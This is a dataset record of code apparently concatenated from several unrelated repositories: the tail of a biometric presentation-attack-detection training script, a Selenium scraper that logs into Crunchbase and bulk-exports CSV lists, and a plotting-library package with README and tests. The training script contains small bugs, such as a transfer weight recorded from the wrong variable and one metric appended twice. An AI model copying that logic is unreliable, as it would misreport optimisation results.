train_history, _, best_epoch = fit(model=model,\n adv_weight = ADV_WEIGHT,\n transfer_weight = TRANSFER_WEIGHT,\n data=(train_loader, 
valid_loader),\n n_fake = NUM_MATERIALS,\n device=DEVICE,\n model_path = model_path, \n output=output_fn)\n \n # save train history\n train_res_fn = output_fn + \"history.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n train_results_.append([train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]])\n \n # Test results\n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, NUM_MATERIALS, ADV_WEIGHT, TRANSFER_WEIGHT, DEVICE)\n print('\\nTest loss: {:.3f} |'.format(test_loss.item()) + ' Test Acc: {:.3f}'.format(test_acc) + '\\nTest APCER: {:.3f} |'.format(test_apcer) + ' Test BPCER: {:.3f}'.format(test_bpcer)) \n print('Test BPCER@APCER=1%: {:.3f} | Test APCER1: {:.3f}'.format(test_bpcer_apcer1, test_apcer1))\n print('Test BPCER@APCER=5%: {:.3f} | Test APCER5: {:.3f}'.format(test_bpcer_apcer5, test_apcer5))\n print('Test BPCER@APCER=10%: {:.3f} | Test APCER10: {:.3f}'.format(test_bpcer_apcer10, test_apcer10))\n print('Test EER: {:.3f}'.format(test_eer))\n results.append((test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n \n best_epochs.append(best_epoch)\n \n # save results\n res_fn = output_fn + 'results.pckl'\n pickle.dump(results, open(res_fn, \"wb\"))\n results = pickle.load(open(res_fn, \"rb\")) \n \n elif mode == 'optim':\n \n best_accuracy = -float('inf')\n 
best_adv_weight = -float('inf')\n best_epoch_ = -float('inf')\n \n step = 0\n\n #for ADV_WEIGHT in ADV_WEIGHT_LIST: \n\n ADV_WEIGHT = 0\n \n for TRANSFER_WEIGHT in TRANSFER_WEIGHT_LIST:\n\n model = CNN_REG().to(DEVICE)\n \n step = step + 1\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n adv_weight = ADV_WEIGHT, \n transfer_weight = TRANSFER_WEIGHT,\n data=(train_loader, valid_loader),\n n_fake = NUM_MATERIALS,\n device=DEVICE,\n model_path = model_path, \n output=output_fn)\n \n # save train history\n train_res_fn = output_fn + \"history_reg.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n history = [train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]]\n \n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, NUM_MATERIALS-1, ADV_WEIGHT, TRANSFER_WEIGHT, DEVICE)\n \n if test_acc > best_accuracy:\n best_accuracy = test_acc\n best_adv_weight = ADV_WEIGHT\n best_transfer_weight = ADV_WEIGHT\n best_epoch_ = best_epoch\n test_results = (test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10)\n tr_results = history\n \n optimization.append((best_accuracy, best_adv_weight, best_transfer_weight))\n \n 
train_results_.append(tr_results)\n best_epochs.append(best_epoch_)\n results.append(test_results) \n \n elif mode == 'test':\n sys.exit(\"Error: in construction yet!\")\n else:\n sys.exit(\"Error: incorrect mode!\")\n \n \n ### PRINT RESULTS -----------------------------------------------------------------------------------------------------------------------------------\n print('\\n\\n\\n-------------------------------------------\\n-------------- R E S U L T S --------------\\n-------------------------------------------') \n \n print()\n print(\"***************\") \n print(DATASET) \n print(\"***************\")\n \n optim_res = []\n \n if optimization != []:\n \n print()\n for m in range(len(optimization)):\n print(\"\\n>> OPTIMIZATION RESULT MATERIAL {}:\\n\".format(m+1))\n print(\" - Best Accuracy = {}\".format(optimization[m][0]))\n print(\" - Best Adv Weight = {}\".format(optimization[m][1]))\n print(\" - Best Transfer Weight = {}\".format(optimization[m][2]))\n optim_res.append(optimization[m][0])\n optim_res.append(optimization[m][1])\n print() \n \n optim_res = np.array(optim_res)\n np.savetxt(DATASET + '_optim.txt', optim_res, fmt='%.3f', delimiter=',')\n \n print('\\n-------------------------------------------') \n \n # Compute average and std\n acc_array = np.array([i[1] for i in results])\n apcer_array = np.array([i[2] for i in results])\n bpcer_array = np.array([i[3] for i in results])\n eer_array = np.array([i[4] for i in results])\n bpcer_apcer1_array = np.array([i[5] for i in results])\n bpcer_apcer5_array = np.array([i[6] for i in results])\n bpcer_apcer10_array = np.array([i[7] for i in results])\n apcer1_array = np.array([i[8] for i in results])\n apcer5_array = np.array([i[9] for i in results])\n apcer10_array = np.array([i[10] for i in results])\n \n #Best epochs\n print('\\nBest epochs:', end=\" \")\n for epoch in best_epochs:\n print(epoch, end=\" \")\n \n #Results of all loops (train and test)\n #Results of all loops (train and test)\n 
np.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n print()\n print(\"\\n[Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]\")\n print()\n print(\">> TRAIN RESULTS:\")\n print()\n for k in range(NUM_MATERIALS):\n print(*train_results_[k], sep = \", \") \n \n print()\n print(\">> TEST RESULTS:\")\n print()\n \n results_test = []\n \n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n \n if iteration == NUM_ITERATIONS-1: \n np.savetxt(DATASET + '_' + attack_txt + '_test.txt', results_test, fmt='%.3f', delimiter=',')\n\n \n print(\"\\n\\nDONE!\")\n\nif __name__ == '__main__':\n main()\n" } ]
23
alexlopespereira/companies
https://github.com/alexlopespereira/companies
943bf3348ed1a2b8da01fc07fd5b6684f8c5554a
39d0747b9e816861115f8bb36ae9da927b85ac8e
bcafc009cd9ffccd62a672f7bd86b2b921f42b2d
refs/heads/master
2023-01-21T19:52:10.360420
2020-12-01T21:14:40
2020-12-01T21:14:40
313,040,449
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5700934529304504, "alphanum_fraction": 0.586915910243988, "avg_line_length": 57.968502044677734, "blob_id": "9e677238bc750c51ff8a7ee982326a963b6598c6", "content_id": "b5eef4337d3d7a996b6a63cb888aa39becac786f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7490, "license_type": "no_license", "max_line_length": 169, "num_lines": 127, "path": "/src/scrapy_crunchbase.py", "repo_name": "alexlopespereira/companies", "src_encoding": "UTF-8", "text": "import datetime\nimport os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nimport shutil\n\nfrom util import wait_element\nfrom auth_data import email, password\n\nclass crawler():\n\n def __init__(self, download_dir, dest_dir):\n self.download_dir = download_dir\n self.dest_dir = dest_dir\n fp = webdriver.FirefoxProfile()\n fp.set_preference(\"browser.download.folderList\", 2)\n fp.set_preference(\"browser.download.manager.showWhenStarting\", False)\n fp.set_preference(\"browser.download.dir\", self.download_dir)\n fp.set_preference(\"browser.helperApps.neverAsk.saveToDisk\",\n \"\"\"text/plain, application/octet-stream, application/binary,\n text/csv, application/csv, application/excel, \n text/comma-separated-values, text/xml, application/xml\"\"\")\n fp.set_preference(\"pdfjs.disabled\", True)\n self.driver = webdriver.Firefox(firefox_profile=fp)\n\n\n def search_funding(self, threshold, start_announced, end_announced, start_founded, end_founded):\n # self.driver.get(url)\n dates_announced = pd.date_range(start=start_announced, end=end_announced, freq=\"6M\")\n status = wait_element(self.driver, \"//search-date//input[@type='search']\", by=By.XPATH, to_sleep=5)\n ins_search = self.driver.find_elements_by_xpath(\"//search-date//input[@type='search']\")\n for sa, ea in zip(dates_announced[0:-1], dates_announced[1:]):\n # status = wait_element(self.driver, 
\"//input[@type='search']\", by=By.XPATH)\n in_start_announced = ins_search[0]\n in_start_announced.clear()\n in_start_announced.send_keys(sa.strftime(\"%Y/%m/%d\"))\n in_end_announced = ins_search[1]\n in_end_announced.clear()\n in_end_announced.send_keys(ea.strftime(\"%Y/%m/%d\"))\n dates_founded = pd.date_range(start=start_founded, end=end_founded, freq=\"6M\")\n for sf, ef in zip(dates_founded[0:-1], dates_founded[1:]):\n in_start_founded = ins_search[2]\n in_start_founded.clear()\n in_start_founded.send_keys(sf.strftime(\"%Y/%m/%d\"))\n in_end_founded = ins_search[3]\n in_end_founded.clear()\n in_end_founded.send_keys(ef.strftime(\"%Y/%m/%d\"))\n wait_element(self.driver, '//button[@aria-label=\"Search\"]', by=By.XPATH, to_sleep=2)\n button_searc = self.driver.find_element_by_xpath('//button[@aria-label=\"Search\"]')\n button_searc.click()\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH, to_sleep=1)\n nresults = int(self.driver.find_element_by_xpath(\"//results-info[@class='flex-none hide show-gt-xs']/h3\").text.split(\" \")[-2].replace(\",\", \"\"))\n if nresults > threshold:\n print(f\"{sa.strftime('%Y/%m/%d')}, {ea.strftime('%Y/%m/%d')}, {sf.strftime('%Y/%m/%d')}, {ef.strftime('%Y/%m/%d')}. 
{nresults} > {threshold}\")\n elif nresults > 0:\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH)\n button_export = self.driver.find_element_by_xpath('//export-csv-button//button')\n button_export.click()\n today_str = datetime.datetime.today().strftime(\"%m-%d-%Y\")\n filename = f\"{self.download_dir}/{self.search_name}-{today_str}.csv\"\n while not os.path.exists(filename):\n time.sleep(1)\n\n dest_file = f\"{self.dest_dir}/{self.search_name}_{sa.strftime('%Y%m%d')}_{ea.strftime('%Y%m%d')}_{sf.strftime('%Y%m%d')}_{ef.strftime('%Y%m%d')}.csv\"\n shutil.move(filename, dest_file)\n\n def search_startup(self, threshold, start_founded, end_founded):\n dates_founded = pd.date_range(start=start_founded, end=end_founded, freq=\"3M\")\n status = wait_element(self.driver, \"//search-date//input[@type='search']\", by=By.XPATH, to_sleep=10)\n ins_search = self.driver.find_elements_by_xpath(\"//search-date//input[@type='search']\")\n for sa, ea in zip(dates_founded[0:-1], dates_founded[1:]):\n in_start_announced = ins_search[0]\n in_start_announced.clear()\n in_start_announced.send_keys(sa.strftime(\"%Y/%m/%d\"))\n in_end_announced = ins_search[1]\n in_end_announced.clear()\n in_end_announced.send_keys(ea.strftime(\"%Y/%m/%d\"))\n wait_element(self.driver, '//button[@aria-label=\"Search\"]', by=By.XPATH, to_sleep=2)\n button_search = self.driver.find_element_by_xpath('//button[@aria-label=\"Search\"]')\n button_search.click()\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH, to_sleep=2)\n nresults = int(self.driver.find_element_by_xpath(\n \"//results-info[@class='flex-none hide show-gt-xs']/h3\")\\\n .text.split(\" \")[-2].replace(\",\", \"\"))\n if nresults > threshold:\n print(f\"{sa.strftime('%Y/%m/%d')}, {ea.strftime('%Y/%m/%d')}. 
{nresults} > {threshold}\")\n elif nresults > 0:\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH)\n button_export = self.driver.find_element_by_xpath('//export-csv-button//button')\n button_export.click()\n today_str = datetime.datetime.today().strftime(\"%m-%d-%Y\")\n filename = f\"{self.download_dir}/{self.search_name}-{today_str}.csv\"\n while not os.path.exists(filename):\n time.sleep(1)\n dest_file = f\"\"\"{self.dest_dir}/{self.search_name}_\n {sa.strftime('%Y%m%d')}_{ea.strftime('%Y%m%d')}.csv\"\"\"\n shutil.move(filename, dest_file)\n\n def crawl(self, url, type=\"funding\"):\n self.driver.get(url)\n self.search_name = type\n self.dest_dir = os.path.join(self.dest_dir, type)\n status = wait_element(self.driver, \"//input[@id='mat-input-1']\", by=By.XPATH)\n in_login = self.driver.find_element_by_xpath(\"//input[@id='mat-input-1']\")\n in_login.send_keys(email)\n in_pass = self.driver.find_element_by_xpath(\"//input[@id='mat-input-2']\")\n in_pass.send_keys(password)\n wait_element(self.driver, '//button[contains(@class,\"login\")]', by=By.XPATH)\n button_login = self.driver.find_element_by_xpath('//button[contains(@class,\"login\")]')\n button_login.click()\n if type == \"funding\":\n self.search_funding(1000, \"2015/01/01\", \"2020/01/01\", \"2015/01/01\", \"2018/01/01\")\n elif type == \"startups\":\n self.search_startup(1000, \"2016/01/01\", \"2019/09/01\")\n\n\nif __name__ == '__main__':\n url_funding = 'https://www.crunchbase.com/lists/fundingrounds/be3ae454-0bc6-443a-8f57-e29f3c3c7f09/funding_rounds'\n url_startup = \"https://www.crunchbase.com/lists/startups/8d54f127-8d3e-4a1b-ade7-bfbaaa5bfc97/organization.companies\"\n search_name = \"funding-rounds\"\n dest_dir = \"/home/alex/vscode/data/original/crunchbase/\"\n download_dir = \"/home/alex/vscode/data/original/crunchbase/tmp\"\n obj = crawler(download_dir=download_dir, dest_dir=dest_dir)\n # obj.crawl(url_funding, type=\"funding\")\n obj.crawl(url_startup, 
type=\"startups\")\n\n" } ]
1
SengerM/myplotlib
https://github.com/SengerM/myplotlib
6620aafecf1b55b8b33198ebce327192f59c6a47
8282226e140647342da69530aadb79b61c7c3394
057233d6eef304a3b600ade75a203846352bde6b
refs/heads/master
2023-07-02T08:09:14.754767
2021-08-10T10:08:26
2021-08-10T10:08:26
288,493,073
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6240126490592957, "alphanum_fraction": 0.7266982793807983, "avg_line_length": 26.521739959716797, "blob_id": "0494040012802d2f7b11f1352b3970c16ebeee6c", "content_id": "94cfd116b32e637d2810085133bcab3b3e866da6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 633, "license_type": "permissive", "max_line_length": 76, "num_lines": 23, "path": "/myplotlib/utils.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from time import sleep\nimport datetime\n\ndef get_timestamp():\n\t\"\"\"\n\tReturns a numeric string with a timestamp. It also halts the execution \n\tof the program during 10 micro seconds to ensure that all returned\n\ttimestamps are different and unique.\n\t\n\tReturns\n\t-------\n\tstr\n\t\tString containing the timestamp. Format isYYYYMMDDHHMMSSmmmmmm.\n\t\n\tExample\n\t-------\t\n\t>>> get_timestamp()\n\t'20181013234913378084'\n\t>>> [get_timestamp(), get_timestamp()]\n\t['20181013235501158401', '20181013235501158583']\n\t\"\"\"\n\tsleep(10e-6) # This ensures that there will not exist two equal timestamps.\n\treturn datetime.datetime.now().strftime('%Y%m%d%H%M%S%f')\n" }, { "alpha_fraction": 0.7143433690071106, "alphanum_fraction": 0.7220093011856079, "avg_line_length": 38.341270446777344, "blob_id": "7d1f3a7e8f4ae89dfde0a741c7a7de0f6d6cef23", "content_id": "7547af3cc2fd1057434e1a19b33bb6d6dd787e08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4959, "license_type": "permissive", "max_line_length": 392, "num_lines": 126, "path": "/README.md", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "# myplotlib\n\n**This is deprecated. Use [grafica](https://github.com/SengerM/grafica) instead.**\n\nMy personal unified interfase for doing plots. The idea is to implement the same interface (at least for basic stuff) for many plotting packages. 
Currently supports Matplotlib and Plotly.\n\n- Matplotlib is the best if you want to end up with a single image (png, pdf) to \"print\" (or just embed in a PDF).\n- Plotly is far better for doing interactive plots, visualize and share them. \n\nSo each package has its own advantages and disadvantages, and they have very different interfases which is a pain. With this package I intend to produce a simple and unified interface for any plotting package that may exist in the universe, so I only have to worry about plotting and all the bureaucracy to produce the plot with this or that package is done in the shadows by ```myplotlib```.\n\n## Installation\n\nIf you have pip (or pip3) installed, just run\n\n```\npip3 install git+https://github.com/SengerM/myplotlib\n```\nOtherwise, check how to install a package hosted in a GitHub repository with your Python package manager.\n\nYou will also need to [install matplotlib](https://matplotlib.org/users/installing.html#installing-an-official-release) (```pip install matplotlib```) and [install plotly](https://plotly.com/python/getting-started/#installation) (```pip install plotly```).\n\n## Example\n\nThe next example shows a simple usage case and as you can see the same code is used both for Plotly and for Matplotlib.:\n\n```Python\nimport myplotlib as mpl # Easy import.\nimport numpy as np\n\nx_data = np.linspace(-1,1)\nrandom_data = np.random.randn(999)\n\nfor package in ['plotly', 'matplotlib']: # Use the same code for both packages!\n\tfig1 = mpl.manager.new(\n\t\ttitle = 'A nice plot',\n\t\tsubtitle = 'Mathematical functions',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tshow_title = False, # This hides the title from the plot, but still uses this title for saving the file if you call \"mpl.manager.save_all\".\n\t\tpackage = package, # Choose between Matplotlib/Plotly.\n\t)\n\tfig1.plot(\n\t\tx_data,\n\t\tx_data**2,\n\t\tlabel = 'x²',\n\t\tmarker = '.',\n\t)\n\tfig1.plot(\n\t\tx_data,\n\t\tx_data**3,\n\t\tlabel = 
'x³',\n\t\tcolor = (0,0,0), # Color is specified as an RGB tuple.\n\t\tlinestyle = 'dashed',\n\t)\n\n\thistogram = mpl.manager.new(\n\t\ttitle = 'This is a histogram',\n\t\tsubtitle = 'Data distribution',\n\t\txlabel = 'Whatever this is',\n\t\tylabel = 'Number of occurrences',\n\t\tpackage = package, # Choose between Matplotlib/Plotly.\n\t)\n\thistogram.hist(\n\t\trandom_data,\n\t\tlabel = 'My data',\n\t\tcolor = (1,.2,.2),\n\t\tbins = 99, # Set the number of bins. Any value compatible with Numpy's histogram function should work here, see https://numpy.org/doc/stable/reference/generated/numpy.histogram.html.\n\t)\n\nmpl.manager.save_all( # Save all the figures.\n\tformat = 'pdf', # Matplotlib figures will be saved in PDF, Plotly figures will be saved in HTML (interactive).\n\tmkdir = 'directory with figures', # If no directory is specified, a directory with the name of the script is created.\n)\n\nmpl.manager.save_all() # Creates a directory and saves all the figures automatically.\nmpl.manager.show() # Show all the figures.\n```\n\nColormaps can be plotted with Matplotlib, Plotly and also with [SAOImageDS9](https://sites.google.com/cfa.harvard.edu/saoimageds9) which is really cool to play with the scale of the colormap. This last option is very useful for images. 
Below there is an example:\n\n```Python\nimport myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(-2,2)\ny = np.linspace(-1,1)\n\nxx,yy = np.meshgrid(x,y)\nzz = xx*yy**2\n\nfor package in ['matplotlib', 'plotly', 'ds9']:\n\tcolormap_figure = mpl.manager.new(\n\t\ttitle = 'Colormap',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tcolormap_figure.colormap(\n\t\tx = xx,\n\t\ty = yy,\n\t\tz = zz,\n\t\tcolorscalelabel = 'z value',\n\t)\nmpl.manager.save_all()\nmpl.manager.show()\n\n```\n\n![The same code produced the three plots!](doc/1.png?raw=true \"Colormaps\")\n\n### More examples\n\nYou can find more examples in the [tests directory](https://github.com/SengerM/myplotlib/tree/master/tests).\n\n## Implemented types of plots\n\nCurrently this package has implemented the following methods:\n\n- ```figure.plot```. Implemented for plotly and matplotlib. Produce x,y plots given two arrays ```x_values``` and ```y_values```.\n- ```figure.hist```. Implemented for plotly and myplotlib. Given an array ```values``` produces a histogram.\n- ```figure.colormap```. Implemented for plotly, matplotlib and ds9. Given matrices ```x_values```, ```y_values``` and ```z_values``` produces a colormap.\n- ```figure.contour```. Implemented for plotly and matplotlib. Same as ```colormap``` but with contour lines.\n- ```figure.fill_between```. Implemented for matplotlib. Produces a \"band plot\", useful for plotting with errors in y.\n\nWARNING: I may forget to update this list. Today is 24.feb.2021. 
You can see examples in the [tests directory](https://github.com/SengerM/myplotlib/tree/master/tests).\n" }, { "alpha_fraction": 0.5375886559486389, "alphanum_fraction": 0.5617021322250366, "avg_line_length": 17.076923370361328, "blob_id": "9a4f8b0f0122b6a466e42633d7dc74e754207e7c", "content_id": "de9647341364c4b009aeef83afdf45acf495ad2a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 705, "license_type": "permissive", "max_line_length": 72, "num_lines": 39, "path": "/tests/test_error_band.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\ndef calc_error(y):\n\treturn ((y**2)**.5)*.1 + max(y*.01)\n\nx = np.linspace(-1,1)\ny = [\n\tx**3,\n\tnp.cos(x),\n\tx**2,\n\tnp.exp(x),\n\tx,\n\t2*x,\n\t3*(x**2)**.5,\n\t-x,\n\tnp.log(x**2)/8,\n]\n\nfor package in ['plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'Fill between with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor idx,yy in enumerate(y):\n\t\tfig.error_band(\n\t\t\tx,\n\t\t\tyy,\n\t\t\tyy + calc_error(yy),\n\t\t\tyy - calc_error(yy),\n\t\t\tlabel = f'Function {idx}',\n\t\t\tmarker = [None,'.','+','o','x'][np.random.randint(4)],\n\t\t\tlinestyle = ['solid', 'none','dashed','doted'][np.random.randint(3)],\n\t\t)\n\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.6743085384368896, "alphanum_fraction": 0.6810712218284607, "avg_line_length": 36.623409271240234, "blob_id": "d5844dfcc64df9c450675d306243d16ddeb80d9a", "content_id": "daaa39c6ad46dc494d7dc4f2216dbe2a44dfa796", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14803, "license_type": "permissive", "max_line_length": 259, "num_lines": 393, "path": "/myplotlib/figure.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import numpy as np\nimport warnings\nfrom 
shutil import copyfile\nimport plotly.graph_objects as go\n\nclass MPLFigure:\n\t\"\"\"\n\tThis class defines the interface to be implemented in the subclasses\n\tand does all the validation of arguments. For example \"title\" must\n\tbe a string, this is validated in this class. How to write the title\n\tin the figure is to be implemented in the respective subclass for\n\tsome particular ploting package, not here.\n\tConvention for getting/setting the properties:\n\t- Each property (e.g. title) has to be defined with 3 @property methods,\n\t 1) title\n\t 2) _title getter\n\t 3) _title setter\n\tSee the definition of title for implementation details.\n\t\"\"\"\n\tDEFAULT_COLORS = [\n\t\t(255, 59, 59),\n\t\t(52, 71, 217),\n\t\t(4, 168, 2),\n\t\t(224, 146, 0),\n\t\t(224, 0, 183),\n\t\t(0, 230, 214),\n\t\t(140, 0, 0),\n\t\t(9, 0, 140),\n\t\t(107, 0, 96),\n\t]\n\tDEFAULT_COLORS = [tuple(np.array(color)/255) for color in DEFAULT_COLORS]\n\n\tdef pick_default_color(self):\n\t\t# ~ global DEFAULT_COLORS\n\t\tcolor = self.DEFAULT_COLORS[0]\n\t\tself.DEFAULT_COLORS = self.DEFAULT_COLORS[1:] + [self.DEFAULT_COLORS[0]]\n\t\treturn color\n\t\n\tdef __init__(self):\n\t\tself._show_title = True\n\t\n\t@property\n\tdef title(self):\n\t\treturn self._title\n\t@property\n\tdef _title(self):\n\t\tif hasattr(self, '_title_'):\n\t\t\treturn self._title_\n\t\telse:\n\t\t\treturn None\n\t@_title.setter\n\tdef _title(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_title> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._title_ = value\n\t\n\t@property\n\tdef show_title(self):\n\t\treturn self._show_title\n\t@property\n\tdef _show_title(self):\n\t\treturn self._show_title_\n\t@_show_title.setter\n\tdef _show_title(self, value):\n\t\tif value not in [True, False]:\n\t\t\traise ValueError(f'<_show_title> must be either True or False, received <{value}> of type {type(value)}.')\n\t\tself._show_title_ = value\n\t\n\t@property\n\tdef 
subtitle(self):\n\t\treturn self._subtitle\n\t@property\n\tdef _subtitle(self):\n\t\tif hasattr(self, '_subtitle_'):\n\t\t\treturn self._subtitle_\n\t\telse:\n\t\t\treturn None\n\t@_subtitle.setter\n\tdef _subtitle(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_subtitle> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._subtitle_ = value\n\t\n\t@property\n\tdef xlabel(self):\n\t\treturn self._xlabel\n\t@property\n\tdef _xlabel(self):\n\t\tif hasattr(self, '_xlabel_'):\n\t\t\treturn self._xlabel_\n\t\telse:\n\t\t\treturn None\n\t@_xlabel.setter\n\tdef _xlabel(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_xlabel> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._xlabel_ = value\n\t\n\t@property\n\tdef ylabel(self):\n\t\treturn self._ylabel\n\t@property\n\tdef _ylabel(self):\n\t\tif hasattr(self, '_ylabel_'):\n\t\t\treturn self._ylabel_\n\t\telse:\n\t\t\treturn None\n\t@_ylabel.setter\n\tdef _ylabel(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_ylabel> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._ylabel_ = value\n\t\n\t@property\n\tdef xscale(self):\n\t\treturn self._xscale\n\t@property\n\tdef _xscale(self):\n\t\tif hasattr(self, '_xscale_'):\n\t\t\treturn self._xscale_\n\t\telse:\n\t\t\treturn None\n\t@_xscale.setter\n\tdef _xscale(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_xscale> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._validate_axis_scale(value)\n\t\tself._xscale_ = value\n\t\n\t@property\n\tdef yscale(self):\n\t\treturn self._yscale\n\t@property\n\tdef _yscale(self):\n\t\tif hasattr(self, '_yscale_'):\n\t\t\treturn self._yscale_\n\t\telse:\n\t\t\treturn None\n\t@_yscale.setter\n\tdef _yscale(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_yscale> must be a string, 
but received <{value}> of type {type(value)}.')\n\t\tself._validate_axis_scale(value)\n\t\tself._yscale_ = value\n\t\n\t@property\n\tdef aspect(self):\n\t\treturn self._aspect\n\t@property\n\tdef _aspect(self):\n\t\tif hasattr(self, '_aspect_'):\n\t\t\treturn self._aspect_\n\t\telse:\n\t\t\treturn None\n\t@_aspect.setter\n\tdef _aspect(self, value: str):\n\t\tif not isinstance(value, str):\n\t\t\traise TypeError(f'<_aspect> must be a string, but received <{value}> of type {type(value)}.')\n\t\tself._validate_aspect(value)\n\t\tself._aspect_ = value\n\t\n\tdef set(self, **kwargs):\n\t\tfor key in kwargs.keys():\n\t\t\tif not hasattr(self, f'_{key}'):\n\t\t\t\traise ValueError(f'Cannot set <{key}>, invalid property.')\n\t\t\tsetattr(self, f'_{key}', kwargs[key])\n\t\n\tdef show(self):\n\t\traise NotImplementedError(f'The <show> method is not implemented yet for the plotting package you are using! (Specifically for the class {self.__class__.__name__}.)')\n\t\n\tdef save(self, fname=None, *args, **kwargs):\n\t\traise NotImplementedError(f'The <save> method is not implemented yet for the plotting package you are using! (Specifically for the class {self.__class__.__name__}.)')\n\t\n\tdef close(self):\n\t\traise NotImplementedError(f'The <close> method is not implemented yet for the plotting package you are using! (Specifically for the class {self.__class__.__name__}.)')\n\t\n\t#### Validation methods ↓↓↓↓\n\t\"\"\"\n\tThis methods validate arguments so we all speak the same language.\n\t\"\"\"\n\tdef _validate_axis_scale(self, scale: str):\n\t\t# Assume that <scale> is a string. Raises an error if \"scale\" is not a valid scale.\n\t\tvalid_scales = ['lin', 'log']\n\t\tif scale not in valid_scales:\n\t\t\traise ValueError(f'Axis scale must be one of {valid_scales}, received {scale}.')\n\t\n\tdef _validate_aspect(self, aspect: str):\n\t\t# Assuming that <aspect> is a string. 
